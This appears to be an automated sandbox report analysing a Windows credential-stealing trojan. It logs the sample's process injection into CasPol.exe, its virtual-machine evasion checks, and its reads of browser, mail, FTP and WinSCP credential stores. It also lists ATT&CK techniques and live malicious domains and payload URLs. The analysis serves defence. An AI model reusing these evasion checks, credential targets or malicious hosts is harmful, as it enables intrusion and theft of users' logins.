            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.945728921.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.945728921.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.944634357.0000000000848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.944895221.000000000087C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7576Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libenchant-2.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libLerc.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcr100.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D2D0C40 sldt word ptr [eax]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040290B FindFirstFileW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeSystem information queried: ModuleInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeAPI call chain: ExitProcess graph end node
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.945728921.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000004.00000002.5704750244.000000000129C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5702999054.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.945728921.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.944634357.0000000000848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.944895221.000000000087C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.946012142.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000004.00000002.5706457767.0000000002D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_71081BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E6250 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8884, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8884, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8884, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            1
            Windows Service
            1
            Access Token Manipulation
            21
            Obfuscated Files or Information
            1
            Credentials in Registry
            117
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth2
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            Windows Service
            1
            Software Packing
            Security Account Manager321
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration2
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)11
            Process Injection
            1
            Timestomp
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer112
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets251
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common251
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635390 Sample: SecuriteInfo.com.Gen.Varian... Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 28 donaldtrumpverse.com 2->28 30 solucionest.com.ar 2->30 32 ftp.solucionest.com.ar 2->32 36 Found malware configuration 2->36 38 Antivirus detection for URL or domain 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 4 other signatures 2->42 8 SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe 4 273 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\System.dll, PE32 8->20 dropped 22 C:\Users\user\AppData\Local\...\msvcr100.dll, PE32 8->22 dropped 24 C:\Users\user\AppData\...\libenchant-2.dll, PE32+ 8->24 dropped 26 3 other files (none is malicious) 8->26 dropped 44 Tries to detect Any.run 8->44 12 CasPol.exe 15 11 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 34 donaldtrumpverse.com 103.211.219.10, 49727, 80 PUBLIC-DOMAIN-REGISTRYUS Seychelles 12->34 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 56 2 other signatures 12->56 18 conhost.exe 12->18         started        52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->52 54 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->54 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe43%VirustotalBrowse
            SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe22%ReversingLabsWin32.Trojan.Nemesis
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exe0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\libLerc.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\libLerc.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\libenchant-2.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\libenchant-2.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\msvcr100.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\msvcr100.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            dual-a-0001.a-msedge.net1%VirustotalBrowse
            e-0009.e-msedge.net0%VirustotalBrowse
            solucionest.com.ar0%VirustotalBrowse
            donaldtrumpverse.com0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://donaldtrumpverse.com/kO4_tiMHM116.bin20%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            https://us1.api.ws-hp.com/clienttelemetry0%Avira URL Cloudsafe
            http://42ScOTnxUv4XWwo.net0%Avira URL Cloudsafe
            http://jGgoxh.com0%Avira URL Cloudsafe
            https://pie-us1.api.ws-hp.com/clienttelemetry0%Avira URL Cloudsafe
            ftp://ftp.solucionest.com.ar/office100%Avira URL Cloudmalware
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            https://stage-us1.api.ws-hp.com/clienttelemetry0%Avira URL Cloudsafe
            http://donaldtrumpverse.com/kO4_tiMHM116.bin0%Avira URL Cloudsafe
